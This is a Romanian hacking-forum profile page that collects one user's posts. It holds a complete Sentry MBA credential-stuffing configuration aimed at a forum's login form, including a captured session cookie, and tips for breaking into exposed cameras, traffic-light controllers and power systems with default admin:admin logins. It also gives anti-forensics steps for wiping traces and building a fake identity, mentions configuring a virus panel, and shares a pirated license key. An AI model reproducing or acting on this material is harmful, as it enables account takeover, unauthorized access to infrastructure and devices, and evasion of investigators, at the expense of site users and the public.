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Everything posted by shadowSQLi
pentru anti-forensics niste sfaturi ca sa nu lasi nici o urma -Disabling time stamps -Disable last acces logs -Encrypt your computer cu truecrypt or ceva de genu -Remove usb logs -remove printer logs -delete the setupapi.log -disable system restore points -disable send error report to microsoft -folosire ccleaner la sfarsitul zilei acum partea grea cu anonimatu asta... In primu rand Pe pc-ul nostru instalam un vpn sigur care nu tine logs, ne stergem profilul de facebook si alte retele de socializare + servicile de mail gen hotmail, yahoo, gmail va recomand https://www.openmailbox.org/inscriptionok.php , acum instalam intr-o masina virtuala https://www.whonix.org/ pe ea punem tor + alt vpn sigur(ce nu tine logs) si de aici facem restu, desigur pt tor exista si o multitudine de pluginuri ce va poate ajuta, gen cookie destroy, disconnect, noscript, zenmate, adblock. Desigur si pe pc nostru si pe masina virtuala n-o sa folosim google deoarece cautarile sunt "captate" recomand duckduckgo.com si ixquick.com. Acum nu folositi pentru filme porno, shopping, banking sau chestii de genu sau sa nu picati in plasa celor ce incearca sa afle date despre dvs.(inginerie sociala). asta pt pc, pt telefon e alta poveste Vpn ce nu tine logs https://www.bestvpn.com/blog/4486/airvpn-review/ Protejare: Firewall recomand comodo si anti-spyware malwarebytes era sa uit ca retea de socializare recomand XMPP(jabber) Pidgin + OTR(Nu vorbiti chestii importante fara otr activat) si ICQ mai este destul de safe incercati sa va creati o identitate falsa dupa fakenamegenator.com si sa folositi aceste date cand vreti sa dezvaluiti detalii despre dvs:) //acestea sunt doar niste informatii, eu nu le aplic deoarece nu fac nimic ilegal mai este mult de continuat aici dar nu am chef sa lungesc discutia, chestia asta o foloseam in trecut am invatat asta de la un prieten care acum numai are voie sa acceseze vrun computer.( el a fost gasit deoarece a picat in capcana unuia aka inginerie sociala)
cand ai facut virusul ai pus encryption key aceeasi cu cea care ai setat'o si-n panel? dar linkul catre api?
teai logat cu alte date username: admin password: admin astea sunt cele corecte
eu iti recomand un negru mai spre gri pe header si fundalul alb si footer-ul la fel ca headerul..
si la mine e la fel, am crezut ca lucreaza la forum + ca aseara a fost si offline nitel timp .
eu deja l-am pus la download..
Sectiunea Config-uri pentru Sentry mba 2015
shadowSQLi replied to io.kent's topic in Programe hacking
unul si pentru hackforums, l-am gasit pe net [Wordlist] UserIndex=1 PassIndex=2 EmailIndex=0 47CB449CA658118F696B5D5772CABB37=15 FC0954C94632176A4B6204ACAF4CECA5=0 D239EFCD303419D3AAE906C05700544B=0 [Settings] SiteURL=http://hackforums.net/showthread.php?tid=4783462 Timeout=20 WaitBot=0 ResolveHost=0 ComboFilter=0 UsernameStart=6 UsernameEnd=8 PasswordStart=6 PasswordEnd=8 ComboMode=0 Letters=0 Digits=0 Alpha=0 Email=0 LowerUpper=0 LetterDigit=0 SpeciaChar=0 PasswordLetters=0 PasswordDigits=0 PasswordAlpha=0 PasswordEmail=0 PasswordLowerUpper=0 PasswordLetterDigit=0 PasswordSpeciaChar=0 EmailFilter=0 EmailMode=0 ProxyActivate=10 ProxyRatio=4 ProxyCombo=0 WaitTime=5 BanWindowWidth=1 BanWindowProxies=10 BanWindowRatio=10 blnNoProxies=0 RequestMethod=2 Referer=2 HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|Referer: http://www.hackforums.net/showthread.php?tid=3560550|User-Agent: <USER AGENT>|Host: <HOST>|Pragma: no-cache|Connection: keep-alive| POSTData=username=<USER>&username=<PASS>&password=&action=do_login&url=%2Fshowthread.php%3Ftid%3D3560550 [Form] IAParse=0 blnBasic=0 Action=http://www.hackforums.net/member.php Username=username Password=username Email= CustomData= NoIndex= AddData=password=&action=do_login&url=%2Fshowthread.php%3Ftid%3D3560550 Cookie=__cfduid=dc06618338165596051cf39326a3ea86f1372547439; sid=ed111512dd07433dde57f8f46a8bdc4c; mybb[lastactive]=1372547438; mybb[lastvisit]=1372547438 IAction=0 IUser=0 IPass=0 IEmail=-2 ICaptcha=-1 ReqReferer= ReqCookie= AjaxURL= AjaxPOSTData= AjaxData= AjaxParsingCode= RefData= ParsingCode= FormRedirectUrl= RedPostData= LoginPostData= RedKeys= DataDesc= CaptureParsingCode= RefreshSession=1 RefreshCookie=1 IAMethod=2 POSTMethod=2 RedMethod=1 LoginMethod=1 AjaxHeader=0 FormHeader=0 RedHeader=0 LoginHeader=0 ImageAfterAjax=0 FollowRedirectsOnIA=0 FollowRedirectsOnRed=1 [Ajax] Variables= PostElements2= RedURL= [OCR] OCRMode=0 URLMode=0 ImageURLID=|| Captcha= OCRKey= RefreshCaptcha=0 blnContrast=0 blnBrightness=0 blnSaturation=0 blnThreshold=0 blnInvert=0 blnNoise=0 blnIsolate=0 blnResize=0 blnBorder=0 blnCharExtract=0 blnRemoveColors=0 blnStringFilter=0 blnLetter=1 blnDigits=1 blnBlur=0 blnReconstruct=0 blnLower=0 blnUpper=0 blnRemoveLines=0 blnMultiChar=0 blnPalette=0 blnCharResize=0 blnCharSubExtraction=0 blnGif=0 blnCompute=0 blnBorderPre=0 Contrast=0 Brightness=0 Saturation=0 Threshold=0 Noise=1 Isolate=1 Resize=2 BorderLeft=0 BorderTop=0 BorderRight=0 BorderBottom=0 CharExtractMinBlack=0 CharExtractMaxBlack=1 CharExtractMinWidth=1 CharRotateMax=0 CharRotateSteps=5 MinLength=1 MaxLength=10 BlurRadius=1 CharExtractMaxWidth=33 CharWidthMinBlack=2 CharSpace=1 Range=0 InvertDensity=0 InvertLength=20 LineCurvatureMax=4 LineWidthMax=13 CharResize=1 CharHeight=13 GifStart=2 GifOffset=2 BorderLeftPre=0 BorderTopPre=0 BorderRightPre=0 BorderBottomPre=0 CharBorderH=5 CharBorderV=5 CharRotateBorder=5 CharExtractMinHeight=1 VerticalRejoin=30 CharExclude= SpecialChars= Colors= Colors2= Lines=Min Length: 2, Max Width: 5, Horizzontal Language=eng [Fake] AfterFP=1 FollowRedirect=1 EnableConHits=0 Success=3 ConHits=0 EnableConLength=0 SourceTags=1 ConLength=-1 blnSuccess=0 SuccessRetries=3 blnForbToOK=0 ForbToOkLength=1000 blnBadOcrCode=0 BadOcrCodeRetries=3 blnCompleteNot=1 HTTPFollow=1 blnProcessErrors=0 blnInvalidPath=1 UserField=0 [Keywords] HeaderFail= HeaderSuccess= HeaderBan= HeaderRetry= SourceFail=You have entered an invalid username/password or email/password combination. SourceSuccess=>Log Out< SourceBan= SourceRetry= EnableHeaderFail=0 EnableHeaderSuccess=0 EnableHeaderBan=0 EnableHeaderRetry=0 EnableSourceFail=1 EnableSourceSuccess=0 EnableSourceBan=1 EnableSourceRetry=0 EnableGlobalSourceRetry=1- 2 replies
- keep-alive|
- no-cache|connection
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nu-l vezi in poza? admin:admin
- 22 replies
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- citytimisoara
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Multumesc mult chiar aveam nevoie de ceva de genu //fa un torrent merge groaznic la mine pe mega
felicitari, tine-o tot asa!
- 16 replies
- microsoft.com
- [fixed]
(and 1 more)
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vand eu cu cs:go cat oferi pt el? are si skinuri si operatiune + rank silver elite
poti sa-mi trimiti prin pm site-ul? oferi vreo suma pentru acel script?
bun, tutorialul, foarte folositor dar eu tot raman la ideea ca openvpn(tor) e best
iti dau informatiile pe jabber daca doresti aici nu risc sa postez cine stie ce accidente provoaca vrun copil:))
- 22 replies
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- citytimisoara
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nu, daca tu ai avea o camera si ai uita datele default si cineva ar intra si te-ar invada "intimitatea" ti se parea normal? //ps am gasit si pt semafoare si la camerele lor=]
- 22 replies
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- citytimisoara
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tare, baiatu.. sparge orce site doar cu puterea mintii, viitorul @TinKode. on: frumos blog imi place tine-o tot asa, dar articolul ala cu puterea mintii e penibil.
poate sa posteze cineva rezolvarile?
scri power system incerci loginu admin admin
- 22 replies
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- citytimisoara
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Am gasit sisteme de alimentare(oprire/pornire a curentului) un videoclip interesant // @ady_adam am gasit cum sa elimini rezultatele celelalte si sa fiseze doar 200 dupa fiecare cautare scri asa -401-400 -403 -301 -302
- 22 replies
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- citytimisoara
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e un cont premium, misto, mersi pt share
Multumesc l-am folosit pe acesta" 3) DYF8B7-877F-NBCXFP-86W7-GCGXWT
te-am dat pm, daca mai ai.